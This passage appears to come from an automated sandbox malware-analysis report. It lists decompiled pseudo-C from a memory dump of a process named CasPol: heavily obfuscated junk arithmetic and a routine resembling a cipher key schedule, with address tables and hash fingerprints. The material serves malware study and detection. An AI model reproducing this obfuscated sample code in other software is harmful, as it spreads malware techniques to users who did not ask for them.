                                                                                                                                                                                                                                                                                                                            					__bh = __bh -  *0x6cc5ec14;
                                                                                                                                                                                                                                                                                                                            					asm("ror byte [0xbf3fefe6], 0x71");
                                                                                                                                                                                                                                                                                                                            					__esp = __esp ^ 0x081dab2e;
                                                                                                                                                                                                                                                                                                                            					asm("sbb [0x74b0d9a8], ch");
                                                                                                                                                                                                                                                                                                                            					asm("rcr dword [0x66b62d11], 0x6");
                                                                                                                                                                                                                                                                                                                            					asm("ror dword [0x97bfdebd], 0xc1");
                                                                                                                                                                                                                                                                                                                            					if(__esp != 0) {
                                                                                                                                                                                                                                                                                                                            						goto L1;
                                                                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                                                                            					__edi = 0x5ce60b7a;
                                                                                                                                                                                                                                                                                                                            					asm("scasd");
                                                                                                                                                                                                                                                                                                                            					__ecx = __ecx + 1;
                                                                                                                                                                                                                                                                                                                            					_t28 = __al;
                                                                                                                                                                                                                                                                                                                            					__al =  *0xaf4f8c00;
                                                                                                                                                                                                                                                                                                                            					 *0xaf4f8c00 = _t28;
                                                                                                                                                                                                                                                                                                                            					asm("adc ebx, [0x408c4815]");
                                                                                                                                                                                                                                                                                                                            					asm("rcl byte [0x94f100c9], 0x5d");
                                                                                                                                                                                                                                                                                                                            					_push(0x5ce60b7a);
                                                                                                                                                                                                                                                                                                                            					_push( *0x6cc8223);
                                                                                                                                                                                                                                                                                                                            					__esp =  *0xbd201d6a * 0x1174;
                                                                                                                                                                                                                                                                                                                            					__ebx =  *0x767cb96b * 0x64ce;
                                                                                                                                                                                                                                                                                                                            					__eax = 0xc70da15;
                                                                                                                                                                                                                                                                                                                            					_pop(__esi);
                                                                                                                                                                                                                                                                                                                            					return 0xc70da15;
                                                                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                                                                            				L1:
                                                                                                                                                                                                                                                                                                                            				 *0x43524309 =  *0x43524309 & _t66;
                                                                                                                                                                                                                                                                                                                            				asm("sbb dh, 0xe7");
                                                                                                                                                                                                                                                                                                                            				asm("sbb edx, 0x82220d1b");
                                                                                                                                                                                                                                                                                                                            				if(( *0xe943ed04 & _t53) < 0) {
                                                                                                                                                                                                                                                                                                                            					_t38 =  *0x5f4f9371;
                                                                                                                                                                                                                                                                                                                            					asm("rcl byte [0x1d77d2e4], 0xcb");
                                                                                                                                                                                                                                                                                                                            					_push(0xc3526c8);
                                                                                                                                                                                                                                                                                                                            					 *0xf2718031 =  *0xf2718031 << 0x6b;
                                                                                                                                                                                                                                                                                                                            					_push( *0x768df2d5);
                                                                                                                                                                                                                                                                                                                            					_t66 = _t66 +  *0xfd6fb6f8;
                                                                                                                                                                                                                                                                                                                            					asm("adc [0xf0f70d08], cl");
                                                                                                                                                                                                                                                                                                                            					if(_t66 >= 0) {
                                                                                                                                                                                                                                                                                                                            						asm("sbb ebp, 0xaf302878");
                                                                                                                                                                                                                                                                                                                            						_t40 =  *0xd555c1d;
                                                                                                                                                                                                                                                                                                                            						 *0xd555c1d = _t38 + 0x26f805f4;
                                                                                                                                                                                                                                                                                                                            						asm("rol dword [0xd4fd1f0d], 0x47");
                                                                                                                                                                                                                                                                                                                            						_t59 = _t59 ^  *0x8c671335;
                                                                                                                                                                                                                                                                                                                            						_t56 = _t56 +  *0x1e3a4d21;
                                                                                                                                                                                                                                                                                                                            						_t8 = _t61;
                                                                                                                                                                                                                                                                                                                            						_t61 =  *0x9702ba6e;
                                                                                                                                                                                                                                                                                                                            						 *0x9702ba6e = _t8;
                                                                                                                                                                                                                                                                                                                            						asm("cmpsw");
                                                                                                                                                                                                                                                                                                                            						if( *0x2a496f10 >= _t53) {
                                                                                                                                                                                                                                                                                                                            							_t41 = _t40 - 0xe9067f78;
                                                                                                                                                                                                                                                                                                                            							 *0xe9afa29f =  *0xe9afa29f - _t33;
                                                                                                                                                                                                                                                                                                                            							_t49 = _t49 -  *0xa6b6bd0a;
                                                                                                                                                                                                                                                                                                                            							_t56 = _t56 & 0x151a3439;
                                                                                                                                                                                                                                                                                                                            							_t77 = _t56;
                                                                                                                                                                                                                                                                                                                            							asm("rcr byte [0x904410a], 0x15");
                                                                                                                                                                                                                                                                                                                            							asm("adc edx, [0x6ec2c2b9]");
                                                                                                                                                                                                                                                                                                                            							if(_t77 >= 0) {
                                                                                                                                                                                                                                                                                                                            								_t9 = _t53;
                                                                                                                                                                                                                                                                                                                            								_t53 =  *0xcc44272;
                                                                                                                                                                                                                                                                                                                            								 *0xcc44272 = _t9;
                                                                                                                                                                                                                                                                                                                            								_t56 = 0xc568051b;
                                                                                                                                                                                                                                                                                                                            								if(_t77 == 0) {
                                                                                                                                                                                                                                                                                                                            									_t33 = _t33 - 0xa553675;
                                                                                                                                                                                                                                                                                                                            									 *0xd2b9e192 = _t41;
                                                                                                                                                                                                                                                                                                                            									asm("rol dword [0xdf2fc60f], 0x91");
                                                                                                                                                                                                                                                                                                                            									_t61 = _t61 &  *0xf809aa31;
                                                                                                                                                                                                                                                                                                                            									 *0x24d95062 =  *0x24d95062 >> 0xd4;
                                                                                                                                                                                                                                                                                                                            									 *0x12a951cc =  *0x12a951cc << 0xdb;
                                                                                                                                                                                                                                                                                                                            									_t49 =  *0xde75bbeb;
                                                                                                                                                                                                                                                                                                                            									_t15 = (_t53 &  *0xd03e682) - 0xe2;
                                                                                                                                                                                                                                                                                                                            									_t53 =  *0xaea0fc25;
                                                                                                                                                                                                                                                                                                                            									 *0xaea0fc25 = _t15;
                                                                                                                                                                                                                                                                                                                            									asm("sbb eax, 0x18d67083");
                                                                                                                                                                                                                                                                                                                            									asm("cmpsw");
                                                                                                                                                                                                                                                                                                                            									_t59 = 0x047197fa &  *0x5d967e2b;
                                                                                                                                                                                                                                                                                                                            									if(0x47197fa != 0) {
                                                                                                                                                                                                                                                                                                                            										asm("sbb ecx, [0x965cf74]");
                                                                                                                                                                                                                                                                                                                            										 *0x16c6af0 =  *0x16c6af0 + _t61;
                                                                                                                                                                                                                                                                                                                            										if( *0x16c6af0 > 0 &&  *0xd215827e * 0x46ab < 0) {
                                                                                                                                                                                                                                                                                                                            											_t16 = _t53;
                                                                                                                                                                                                                                                                                                                            											_t53 =  *0x9d4a1571;
                                                                                                                                                                                                                                                                                                                            											 *0x9d4a1571 = _t16;
                                                                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                                                                            				goto L1;
                                                                                                                                                                                                                                                                                                                            			}






















                                                                                                                                                                                                                                                                                                                            0x004224cd
                                                                                                                                                                                                                                                                                                                            0x004224ce
                                                                                                                                                                                                                                                                                                                            0x004224ce
                                                                                                                                                                                                                                                                                                                            0x004224d4
                                                                                                                                                                                                                                                                                                                            0x004224da
                                                                                                                                                                                                                                                                                                                            0x004224e1
                                                                                                                                                                                                                                                                                                                            0x004224e7
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x004224f3
                                                                                                                                                                                                                                                                                                                            0x004224f9
                                                                                                                                                                                                                                                                                                                            0x004224ff
                                                                                                                                                                                                                                                                                                                            0x00422505
                                                                                                                                                                                                                                                                                                                            0x00422506
                                                                                                                                                                                                                                                                                                                            0x0042250c
                                                                                                                                                                                                                                                                                                                            0x00422512
                                                                                                                                                                                                                                                                                                                            0x00422514
                                                                                                                                                                                                                                                                                                                            0x0042251a
                                                                                                                                                                                                                                                                                                                            0x00422521
                                                                                                                                                                                                                                                                                                                            0x00422527
                                                                                                                                                                                                                                                                                                                            0x00422529
                                                                                                                                                                                                                                                                                                                            0x00422535
                                                                                                                                                                                                                                                                                                                            0x00422536
                                                                                                                                                                                                                                                                                                                            0x00422537
                                                                                                                                                                                                                                                                                                                            0x00422538
                                                                                                                                                                                                                                                                                                                            0x0042253d
                                                                                                                                                                                                                                                                                                                            0x00422543
                                                                                                                                                                                                                                                                                                                            0x0042254a
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00422550
                                                                                                                                                                                                                                                                                                                            0x00422556
                                                                                                                                                                                                                                                                                                                            0x0042255d
                                                                                                                                                                                                                                                                                                                            0x0042256a
                                                                                                                                                                                                                                                                                                                            0x0042256b
                                                                                                                                                                                                                                                                                                                            0x00422571
                                                                                                                                                                                                                                                                                                                            0x00422577
                                                                                                                                                                                                                                                                                                                            0x0042257e
                                                                                                                                                                                                                                                                                                                            0x00422584
                                                                                                                                                                                                                                                                                                                            0x0042258a
                                                                                                                                                                                                                                                                                                                            0x00422591
                                                                                                                                                                                                                                                                                                                            0x00422598
                                                                                                                                                                                                                                                                                                                            0x0042259e
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x004225aa
                                                                                                                                                                                                                                                                                                                            0x004225aa
                                                                                                                                                                                                                                                                                                                            0x004225aa
                                                                                                                                                                                                                                                                                                                            0x004225b0
                                                                                                                                                                                                                                                                                                                            0x004225b7
                                                                                                                                                                                                                                                                                                                            0x004225be
                                                                                                                                                                                                                                                                                                                            0x004225c4
                                                                                                                                                                                                                                                                                                                            0x004225c5
                                                                                                                                                                                                                                                                                                                            0x004225cb
                                                                                                                                                                                                                                                                                                                            0x004225d1
                                                                                                                                                                                                                                                                                                                            0x004225d4
                                                                                                                                                                                                                                                                                                                            0x004225da
                                                                                                                                                                                                                                                                                                                            0x004225e4
                                                                                                                                                                                                                                                                                                                            0x004225eb
                                                                                                                                                                                                                                                                                                                            0x004225f2
                                                                                                                                                                                                                                                                                                                            0x004225f3
                                                                                                                                                                                                                                                                                                                            0x004225f9
                                                                                                                                                                                                                                                                                                                            0x00422600
                                                                                                                                                                                                                                                                                                                            0x00422606
                                                                                                                                                                                                                                                                                                                            0x0042260c
                                                                                                                                                                                                                                                                                                                            0x00422612
                                                                                                                                                                                                                                                                                                                            0x00422618
                                                                                                                                                                                                                                                                                                                            0x0042261e
                                                                                                                                                                                                                                                                                                                            0x0042261f
                                                                                                                                                                                                                                                                                                                            0x00422625
                                                                                                                                                                                                                                                                                                                            0x0042262c
                                                                                                                                                                                                                                                                                                                            0x00422632
                                                                                                                                                                                                                                                                                                                            0x00422639
                                                                                                                                                                                                                                                                                                                            0x0042263f
                                                                                                                                                                                                                                                                                                                            0x00422645
                                                                                                                                                                                                                                                                                                                            0x0042264c
                                                                                                                                                                                                                                                                                                                            0x00422653
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00422659
                                                                                                                                                                                                                                                                                                                            0x0042265e
                                                                                                                                                                                                                                                                                                                            0x0042265f
                                                                                                                                                                                                                                                                                                                            0x00422660
                                                                                                                                                                                                                                                                                                                            0x00422660

                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 020783bb0c6e94a2f0c879c0faef6be5a4f7e7562fff37f8ea5d2a0a7134f71c
                                                                                                                                                                                                                                                                                                                            • Instruction ID: b1ab45619040a89c254516e21e0c5809a2fe6c28895202581e121ed34705c7c5
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 020783bb0c6e94a2f0c879c0faef6be5a4f7e7562fff37f8ea5d2a0a7134f71c
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EEC1A6329187A1CFDB16CF38D98AB413FB1F796324B88425ED0A1535E2DB792115CF89
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 67%
                                                                                                                                                                                                                                                                                                                            			E00405623(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                                                                            				signed int _t66;
                                                                                                                                                                                                                                                                                                                            				signed int* _t69;
                                                                                                                                                                                                                                                                                                                            				signed int* _t81;
                                                                                                                                                                                                                                                                                                                            				signed int _t94;
	signed int _t96;
	signed int _t106;
	signed int _t108;
	signed int* _t110;
	signed int _t127;
	signed int _t129;
	signed int _t133;
	signed int _t152;
	intOrPtr _t171;

	_t81 = _a12;
	_t110 = _a8;
	asm("ror esi, 0x8");
	asm("rol eax, 0x8");
	 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
	asm("ror edi, 0x8");
	asm("rol esi, 0x8");
	_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
	asm("ror edi, 0x8");
	asm("rol esi, 0x8");
	_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
	_t66 =  &(_t110[1]);
	asm("ror edi, 0x8");
	asm("rol esi, 0x8");
	_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
	asm("ror edi, 0x8");
	asm("rol esi, 0x8");
	_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
	asm("ror edi, 0x8");
	asm("rol esi, 0x8");
	_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
	asm("ror edi, 0x8");
	asm("rol esi, 0x8");
	_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
	asm("ror esi, 0x8");
	asm("rol ecx, 0x8");
	_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
	if(_a16 != 0x100) {
		L4:
		return _t66 | 0xffffffff;
	} else {
		_t171 = _a4;
		_t69 = 0;
		_a12 = 0;
		while(1) {
			_t152 =  *(_t66 + 0x18);
			_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
			_t127 =  *_t66 ^ _t94;
			 *(_t66 + 0x1c) = _t94;
			_t96 =  *(_t66 + 4) ^ _t127;
			 *(_t66 + 0x20) = _t127;
			_t129 =  *(_t66 + 8) ^ _t96;
			 *(_t66 + 0x24) = _t96;
			 *(_t66 + 0x28) = _t129;
			if(_t69 == 6) {
				break;
			}
			_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
			_t133 =  *(_t66 + 0x10) ^ _t106;
			 *(_t66 + 0x2c) = _t106;
			_t108 =  *(_t66 + 0x14) ^ _t133;
			 *(_t66 + 0x34) = _t108;
			_t69 =  &(_a12[0]);
			 *(_t66 + 0x30) = _t133;
			 *(_t66 + 0x38) = _t108 ^ _t152;
			_t66 = _t66 + 0x20;
			_a12 = _t69;
			if(_t69 < 7) {
				continue;
			} else {
				goto L4;
			}
			goto L6;
		}
		return 0xe;
	}
	L6:
}

                                                                                                                                                                                                                                                                                                                            0x00405832
                                                                                                                                                                                                                                                                                                                            0x00405837
                                                                                                                                                                                                                                                                                                                            0x0040571c
                                                                                                                                                                                                                                                                                                                            0x0040571c
                                                                                                                                                                                                                                                                                                                            0x0040571f
                                                                                                                                                                                                                                                                                                                            0x00405721
                                                                                                                                                                                                                                                                                                                            0x00405724
                                                                                                                                                                                                                                                                                                                            0x00405724
                                                                                                                                                                                                                                                                                                                            0x00405789
                                                                                                                                                                                                                                                                                                                            0x0040578e
                                                                                                                                                                                                                                                                                                                            0x00405790
                                                                                                                                                                                                                                                                                                                            0x00405796
                                                                                                                                                                                                                                                                                                                            0x00405798
                                                                                                                                                                                                                                                                                                                            0x0040579e
                                                                                                                                                                                                                                                                                                                            0x004057a0
                                                                                                                                                                                                                                                                                                                            0x004057a3
                                                                                                                                                                                                                                                                                                                            0x004057a9
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00405805
                                                                                                                                                                                                                                                                                                                            0x0040580b
                                                                                                                                                                                                                                                                                                                            0x0040580d
                                                                                                                                                                                                                                                                                                                            0x00405813
                                                                                                                                                                                                                                                                                                                            0x00405815
                                                                                                                                                                                                                                                                                                                            0x0040581a
                                                                                                                                                                                                                                                                                                                            0x0040581b
                                                                                                                                                                                                                                                                                                                            0x0040581e
                                                                                                                                                                                                                                                                                                                            0x00405821
                                                                                                                                                                                                                                                                                                                            0x00405824
                                                                                                                                                                                                                                                                                                                            0x0040582a
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x0040582a
                                                                                                                                                                                                                                                                                                                            0x00405841
                                                                                                                                                                                                                                                                                                                            0x00405841
                                                                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                                                                                                                                                                                                                                                                            • Instruction ID: c92e21bcf2a8b426bbd036bc601a8418409ab627789888f1acc8345be8f7aa48
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 405174B3E14A214BD3188E09CC40632B792FFD8312B5F81BEDD199B357CA74E9529A90
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 66%
                                                                                                                                                                                                                                                                                                                            			E0040561A(void* __eax, intOrPtr* __edx, intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16, char _a1412832062) {
                                                                                                                                                                                                                                                                                                                            				signed int _t68;
                                                                                                                                                                                                                                                                                                                            				signed int* _t73;
                                                                                                                                                                                                                                                                                                                            				signed int* _t86;
                                                                                                                                                                                                                                                                                                                            				signed int _t99;
                                                                                                                                                                                                                                                                                                                            				signed int _t101;
                                                                                                                                                                                                                                                                                                                            				signed int _t111;
                                                                                                                                                                                                                                                                                                                            				signed int _t113;
                                                                                                                                                                                                                                                                                                                            				signed int* _t116;
                                                                                                                                                                                                                                                                                                                            				signed int _t133;
                                                                                                                                                                                                                                                                                                                            				signed int _t135;
                                                                                                                                                                                                                                                                                                                            				signed int _t139;
                                                                                                                                                                                                                                                                                                                            				signed int _t160;
                                                                                                                                                                                                                                                                                                                            				intOrPtr _t182;
                                                                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                                                                            				 *__edx =  *__edx - 1;
                                                                                                                                                                                                                                                                                                                            				_push( &_a1412832062);
                                                                                                                                                                                                                                                                                                                            				_t86 = _a12;
                                                                                                                                                                                                                                                                                                                            				_t116 = _a8;
                                                                                                                                                                                                                                                                                                                            				asm("ror esi, 0x8");
                                                                                                                                                                                                                                                                                                                            				asm("rol eax, 0x8");
                                                                                                                                                                                                                                                                                                                            				 *_t116 =  *_t86 & 0xff00ff00 |  *_t86 & 0x00ff00ff;
                                                                                                                                                                                                                                                                                                                            				asm("ror edi, 0x8");
                                                                                                                                                                                                                                                                                                                            				asm("rol esi, 0x8");
                                                                                                                                                                                                                                                                                                                            				_t116[1] = _t86[1] & 0xff00ff00 | _t86[1] & 0x00ff00ff;
                                                                                                                                                                                                                                                                                                                            				asm("ror edi, 0x8");
                                                                                                                                                                                                                                                                                                                            				asm("rol esi, 0x8");
                                                                                                                                                                                                                                                                                                                            				_t116[2] = _t86[2] & 0xff00ff00 | _t86[2] & 0x00ff00ff;
                                                                                                                                                                                                                                                                                                                            				_t68 =  &(_t116[1]);
                                                                                                                                                                                                                                                                                                                            				asm("ror edi, 0x8");
                                                                                                                                                                                                                                                                                                                            				asm("rol esi, 0x8");
                                                                                                                                                                                                                                                                                                                            				_t116[3] = _t86[3] & 0xff00ff00 | _t86[3] & 0x00ff00ff;
                                                                                                                                                                                                                                                                                                                            				asm("ror edi, 0x8");
                                                                                                                                                                                                                                                                                                                            				asm("rol esi, 0x8");
                                                                                                                                                                                                                                                                                                                            				_t116[4] = _t86[4] & 0xff00ff00 | _t86[4] & 0x00ff00ff;
                                                                                                                                                                                                                                                                                                                            				asm("ror edi, 0x8");
                                                                                                                                                                                                                                                                                                                            				asm("rol esi, 0x8");
                                                                                                                                                                                                                                                                                                                            				_t116[5] = _t86[5] & 0xff00ff00 | _t86[5] & 0x00ff00ff;
                                                                                                                                                                                                                                                                                                                            				asm("ror edi, 0x8");
                                                                                                                                                                                                                                                                                                                            				asm("rol esi, 0x8");
                                                                                                                                                                                                                                                                                                                            				_t116[6] = _t86[6] & 0xff00ff00 | _t86[6] & 0x00ff00ff;
                                                                                                                                                                                                                                                                                                                            				asm("ror esi, 0x8");
                                                                                                                                                                                                                                                                                                                            				asm("rol ecx, 0x8");
                                                                                                                                                                                                                                                                                                                            				_t116[7] = _t86[7] & 0xff00ff00 | _t86[7] & 0x00ff00ff;
                                                                                                                                                                                                                                                                                                                            				if(_a16 != 0x100) {
                                                                                                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                                                                                                            					return _t68 | 0xffffffff;
                                                                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                                                                            					_t182 = _a4;
                                                                                                                                                                                                                                                                                                                            					_t73 = 0;
                                                                                                                                                                                                                                                                                                                            					_a12 = 0;
                                                                                                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                                                                                                            						_t160 =  *(_t68 + 0x18);
                                                                                                                                                                                                                                                                                                                            						_t99 = ( *(_t182 + 4 + (_t160 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t182 +  &(_t73[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t182 + 4 + (_t160 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t182 + 5 + (_t160 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t182 + 4 + (_t160 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t68 - 4);
                                                                                                                                                                                                                                                                                                                            						_t133 =  *_t68 ^ _t99;
                                                                                                                                                                                                                                                                                                                            						 *(_t68 + 0x1c) = _t99;
                                                                                                                                                                                                                                                                                                                            						_t101 =  *(_t68 + 4) ^ _t133;
                                                                                                                                                                                                                                                                                                                            						 *(_t68 + 0x20) = _t133;
                                                                                                                                                                                                                                                                                                                            						_t135 =  *(_t68 + 8) ^ _t101;
                                                                                                                                                                                                                                                                                                                            						 *(_t68 + 0x24) = _t101;
                                                                                                                                                                                                                                                                                                                            						 *(_t68 + 0x28) = _t135;
                                                                                                                                                                                                                                                                                                                            						if(_t73 == 6) {
                                                                                                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                                                                            						_t111 = ( *(_t182 + 4 + (_t135 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t182 + 4 + (_t135 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t182 + 4 + (_t135 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t182 + 5 + (_t135 & 0x000000ff) * 4) & 0x000000ff ^  *(_t68 + 0xc);
                                                                                                                                                                                                                                                                                                                            						_t139 =  *(_t68 + 0x10) ^ _t111;
                                                                                                                                                                                                                                                                                                                            						 *(_t68 + 0x2c) = _t111;
                                                                                                                                                                                                                                                                                                                            						_t113 =  *(_t68 + 0x14) ^ _t139;
                                                                                                                                                                                                                                                                                                                            						 *(_t68 + 0x34) = _t113;
                                                                                                                                                                                                                                                                                                                            						_t73 =  &(_a12[0]);
                                                                                                                                                                                                                                                                                                                            						 *(_t68 + 0x30) = _t139;
                                                                                                                                                                                                                                                                                                                            						 *(_t68 + 0x38) = _t113 ^ _t160;
                                                                                                                                                                                                                                                                                                                            						_t68 = _t68 + 0x20;
                                                                                                                                                                                                                                                                                                                            						_a12 = _t73;
                                                                                                                                                                                                                                                                                                                            						if(_t73 < 7) {
                                                                                                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                                                                            							goto L5;
                                                                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                                                                            						goto L7;
                                                                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                                                                            					return 0xe;
                                                                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                                                                            				L7:
                                                                                                                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                                                                                                                            0x00405805
                                                                                                                                                                                                                                                                                                                            0x0040580b
                                                                                                                                                                                                                                                                                                                            0x0040580d
                                                                                                                                                                                                                                                                                                                            0x00405813
                                                                                                                                                                                                                                                                                                                            0x00405815
                                                                                                                                                                                                                                                                                                                            0x0040581a
                                                                                                                                                                                                                                                                                                                            0x0040581b
                                                                                                                                                                                                                                                                                                                            0x0040581e
                                                                                                                                                                                                                                                                                                                            0x00405821
                                                                                                                                                                                                                                                                                                                            0x00405824
                                                                                                                                                                                                                                                                                                                            0x0040582a
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                                                                            0x0040582a
                                                                                                                                                                                                                                                                                                                            0x00405841
                                                                                                                                                                                                                                                                                                                            0x00405841
                                                                                                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000002.00000002.449154669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 2ce704aa24f96a960dd36de3184e2fe5393f6b25cf4a27a029cfee13f74fcba8
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 7a5e131291d5020cb5b90ce682f62ef5b0e82d6bf1bae1d424c5499887998d5c
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2ce704aa24f96a960dd36de3184e2fe5393f6b25cf4a27a029cfee13f74fcba8
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: EE51A5B3E14A214BD3188F09CD40632B692FFD8312B5FC1BECD199B357CE74A9529A90
                                                                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                                                                                                                            			E004038BC(signed char* __eax, void* __eflags) {
                                                                                                                                                                                                                                                                                                                            				signed char* _t39;
                                                                                                                                                                                                                                                                                                                            				unsigned int _t58;
                                                                                                                                                                                                                                                                                                                            				signed int _t60;
                                                                                                                                                                                                                                                                                                                            				unsigned int _t64;
                                                                                                                                                                                                                                                                                                                            				unsigned int _t72;
